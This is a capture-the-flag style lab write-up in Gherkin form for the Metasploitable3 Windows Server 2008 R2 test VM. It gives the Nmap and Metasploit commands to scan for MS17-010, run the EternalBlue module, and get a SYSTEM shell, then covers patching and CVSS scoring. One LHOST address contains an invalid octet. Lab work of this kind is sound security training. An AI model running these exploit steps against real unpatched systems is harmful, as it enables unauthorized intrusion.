## Version 1.4.1
## language: en

Feature:
  TOE:
    Metasploitable3 Windows Server 2008 R2
  Category:
    Access Control
  Location:
    192.168.56.106:445 TCP
  CWE:
    CWE-20: Improper Input Validation
  Rule:
    REQ.R342: Validate request parameters
  Goal:
    Gain system-level shell access
  Recommendation:
    Ensure to get the latest OS updates

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Kali Rolling    | 2020.3 x64  |
    | VirtualBox      | 6.1.14      |
    | Metasploit      | 5.0.99-dev  |
    | Nmap            | 7.80        |
  TOE information:
    Given I am runing TOE in a VM at:
    """
    192.168.56.106
    """

  Scenario: Normal use case - Get system-level shell throught admin user
    Given I got any of the valid administrator credentials
    When I log in the TOE
    Then I download the PsExec tool from the site:
    """
    https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
    """
    Then I execute the following command in PsExec folder:
    """
    psexec -i -s CMD
    """
    And I get a system shell[evidence](sysh.png)

  Scenario: Static detection
    Given a closed-source TOE
    Then I cannot get access to the source code

  Scenario: Dynamic detection - EternalBlue exploit not patched
    Given an scan to TOE with Nmap:
    """
    nmap -sn 192.168.56.0/24
    """
    Then I get the location of the TOE:
    """
    ...
    Nmap scan report for 192.168.56.106
    Host is up (0.00038s latency).
    ...
    """
    Given an infamous exploit developed by the U.S. NSA called "EternalBlue"
    When I execute msfconsole
    And I search the EternalBlue exploit:
    """
    search eternalblue
    """
    Then I get the following modules[evidence](modules.png)
    Then I can execute the following command:
    """
    use auxiliary/scanner/smb/smb_ms17_010
    """
    And I set the target host of the scanner:
    """
    RHOST 192.168.56.106
    """
    When I run the scanner
    Then I get the output[evidence](isvuln.png)
    And I can conclude that the TOE is vulnerable to EternalBlue exploit

  Scenario: Exploitation - Gain system-level shell access through EternalBlue
    Given target host 192.168.56.106:445
    And attacker host 192.168.56.103:4444
    Then I can execute the following module in msfconsole:
    """
    use exploit/windows/smb/ms17_010_eternalblue
    """
    And I set the local and remote host:
    """
    set LHOST 192.268.56.103
    set RHOST 192.168.56.106
    """
    When I run the exploit with the command:
    """
    exploit
    """
    Then I get the output[evidence](pwnd.png)
    Then I execute the shell in meterpreter
    And I can verify the access level of the shell prompt
    """
    ...
    whoami
    whoami
    nt authority\system
    """
    Then I can conclude that it's possible to gain system-level shell access

  Scenario: Remediation - Update OS
    Given I have patched the TOE with the OS updates:
    """
    KB4012212
    KB4013429
    """
    Then If I re-run the EternalBlue exploit scan
    Then I get the output[evidence](notvuln.png)
    And I can confirm that the vulnerability was successfully patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.1/10 (High) - /AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.5/10 (High) - /E:F/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    7.5/10 (High) - /MAV:N/MAC:H/MPR:N/MUI:N/MS:U/MC:H/MI:H/MA:H

  Scenario: Correlations
    No correlations have been found to this date {2020-10-14}
